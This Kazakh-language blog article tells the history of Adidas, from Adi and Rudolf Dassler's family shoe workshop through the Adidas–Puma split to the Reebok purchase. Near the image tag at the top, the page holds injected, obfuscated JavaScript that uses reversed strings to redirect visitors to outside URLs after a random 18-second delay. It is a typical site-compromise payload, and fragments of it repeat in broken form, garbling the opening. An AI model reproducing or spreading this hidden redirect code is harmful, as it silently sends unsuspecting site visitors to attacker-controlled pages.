Adidas-тың тарихы

Adidas-original.svg$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/20110209132917702px-Adidas-original.svg.jpg» height=»250″ width=»275″ />Бүгінде дүние жүзіндегі киім нарығында ең танымал атаулардың бірі Adidas. Оны ойлап тапқан кім еді? Әдетте, бұл туралы ойлана бермейміз. Бай адамдар туралы айтылып жатқанда да оның кәсібіне аса мән бере қоймаймыз. Ол қалай байыды, кім еді, кім болды, оның жетістік кілті қандай? Осы сұрақтарға жауап іздегенде ғана сол бай-қуатты адамдардың өзіміз сияқты қатардағы адам болғанына куә боламыз.
Adidas компаниясының негізін қалаушы Адольф Дасслер, 1900 жылы 3-ші қарашада немістің Герцогенаурах қаласында дүниеге келген. Адольфтың отбасы бай адамдардың қатарына жатпайтын, әкесі наубайханада, ал, анасы кір жуатын мекемеде жұмыс істеді. Бірінші дүниежүзілік соғыс олардың отбасылық жағдайын тіптен тұралатып тастады.
Бұл адамдардың инфлияция мен жұмыссыздықтан әбден шаршаған кезеңі болатын. Соғыс біикен соң жағдай тіпті күрделеніп кетті, соғыстан қайтқан азаматтарға жұмыс табу қиынға түсті. Әйтеуір тамақ тапсақ болды деген ниетпен Дасслердің отбасы аяқ киім тігуге бел буды. Әйелдер кенептен аяқ киім пішетін, ал ерлер болса (ішінде Адольфте бар) тігетін.
Еңбекқор отбасы тіккен аяқ киімдер көп ұзамай-ақ өте танымал бола бастады. Әсіресе, кішкентай Ади (Адольф) ойлап тапқан үйде киетін аяқ киімдер зор сұранысқа ие бола бастады. Бұйымдардың халық арасында кең таралуына әсіресе, Адолфьтың ағасы Рудольфтың сату таланты көп көмектесті. Ол мықты маркетолог болып шықты. Арада төрт жыл өткен соң Дасслерлер «Ағайынды Дасслерлердің аяқ киім фабрикасы» атты компанияларын тіркетті.Бұл кезде отбасы мүшелерінен басқа компанияда 20-ға жуық адам жұмыс істеді.
Адольф пенРудольфтердің дан-дүниесі бір-біріне мүлдем ұқсамайтын.Ади тым қарапайым еді, оқығанды жақсы көретін, классикалық музыка тыңдағанды, әдеби кітаптар оқығанды жақсы көретін. Әсіресе, футбол десе ішкен асын жерге қоятын. Рудольф керісінше, өте жылдам, қызуқанды болатын. Бос уақытында бокспен айналысатын болмаса қыз-қырқынмен көңіл көтеруді қалайтын.
1925 жылы ағайындылардың тағдырын өзгерткен маңызды оқиға орын алады. Ади әлемде алғаш рет «тікенекті» бутсы ойлап тапты. Бұл аяқ киім нарығындағы төңкеріс еді.
Көп уақыт өтпей-ақ бұл аяқ киім компанияның негізгі өніміне айналды, гимнастикалық аяқ киімдер де танымал бола бастады.
Бутсыды әсіресе кәсіби футболистер жоғары бағалады, сұраныс көбейгендіктен «Дасслерлердің фабрикасы» енді үйлерінен шығып жеке ғимаратты жалға алды, 25 жалдамалы жұмысшысы бар фабрика енді күніне 100 пар аяқ киім тіге бастады.
1928 жылы Dassler брэнді дүние жүзіне жол тартты. Амстердамдағы Олимпиадаға қатысушы көптеген спортшылар ағайынды Дасслерлердің аяқ киімін киіп шықты.
Ал, 1932 жылы Берлинде өткен олимпиада да жүлделі орын алған спортшылар Dasslerдің бутсиын киіп шықты. Осы жыл фабрика аяқ киім сатудан түскен 400 мың долларын салып, жаңа екінші фабрика ашты. Бұл кезде Екінші дүниежүзілік соғыстың оты тұтана бастап еді.
Ағайынды Дасслерлер Гитлердің пікірлесі еді. Сондықтан да екі ағайынды да соғысқа аттанды, енді фабрика әскерилерге арнап аяқ киім шығара бастады, енді өндіріс тәжірибесі аз адамдардың қолына өтті.
Кейінірек Ади соғыстан қайтып, өндірісті қолына алды. Германия соғыста жеңіліс тапқан соң, Дасслерлер фабрикасын американдық солдаттар басып алып, АҚШ-қа арнап коньяк шығара бастады. Отбасының үйі де американдықтардың қолына өтті. Бір жылдан кейін олар фабриканы тастап кетті, бұл уақытта тұтқыннан босанған Рудольфта елге оралған еді.
 Dassler компаниясының жұмысы енді қайтып үйлесе қоймады, ағайындылар бірге жұмыс істегісі келмеді, мұның себебін ешкім білмейді. Екі фабриканы бөлісіп алды да,өзара келісім-шартқа отырды, отбасының тегін екеуі де қолданбайтын болып келісті. Сөйтіп 1948 жылы бітіспес жауға айналған екі компания пайда болды. Бұл қазіргі таңдағы ең танымал компаниялар Adidas (Ади Дасслер) пен Puma еді (Руди Дасслер). Ағайындылар өмірлерінің соңына дейін сөйлескен емес және бір-біріне деген қарсылықтары да бір сәт те толастаған жоқ.
 1949 жылы Adidas компаниясы ади ойлап тапқан «тікенекті» бутсиды қайта тіге бастады. Бұл жаңа үлгідегі спорттық аяқ киімдердің көшбасшысына айналды.Хельсинкиде өткен олимпиада да спортшылардың басым бөлігі Adidas аяқкиімдерін киіп шықты, бұл компанияның өндірісінің жаңа биікке көтерілуіне алғышарт болды.Енді компания спорттық күртешелер мен сөмкелер шығара бастады. Вили Зельтенрайхтың текстил зауыты енді тек қана Adidas-тың тапсырысымен жұмыс істей бастады.
Футболдан әлем чемпионатында Германия құрамасының жеңіске жетуі Adidas –ты бас айналдырар жетістікке жеткізді. Жеңімпаз құрама мүшелерінің аяғына ілгені бір кездегі кішкене Адидің ойлап тапқан бутсиы еді. Мұнан кейін Ади Дасслер футбол алаңын айнала жарнамаларын іле бастады.
Бұл жарнамаларға енді футболға келген көрерменнің ғана емес, телекөрермендер де көзі түсе бастады. 1956 жылы Adidas олимпиадалық Комитетпен келісімге қол қойып, нәтижеде Олимпиада ойындарының бас демеушісіне айналды.
 Adidas формасын киген спортшылар мұнан кейін қаншама жеңістерге ие болды, бұл әрине компанияның сапалы бұйымдарымен ғана байланысты десек жаңылысамыз, бұл бұйымдарда бала кезінен футболға ғашық болған Ади Дасслердің үлкен махаббаты бар еді.
 Adidas негізін қалаушы Ади 1978 жыл өмірден өтті. Әрине, компания әр жылдарда жеңісті де, жеңілісті де бастан кешті, бұл бизнес үшін қалыпты нәрсе, ең басты жеңіс ол НӘТИЖЕ. Қазір Adidas компаниясы дүниежүзіндегі ең көп сатылатын спорт киімдерін шығаратын танымал брэндтердің көшбасында тұр. Компания бүгінге дейін футбол әлеміндегі ең басты бәсекелесі N-ні алдына түсіре қойған жоқ.
2005 жылы Adidas үшін ең маңызды оқиға Reebok компаниясын сатып алуы болды. Ади Дасслер негізін қалаған компанияның ерекшелігі бастапқы құндылықтарын сақтай отырып, күнде өзгеріп жатқан заманамен бірге болашаққа жасап отырған нық қадамы.{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика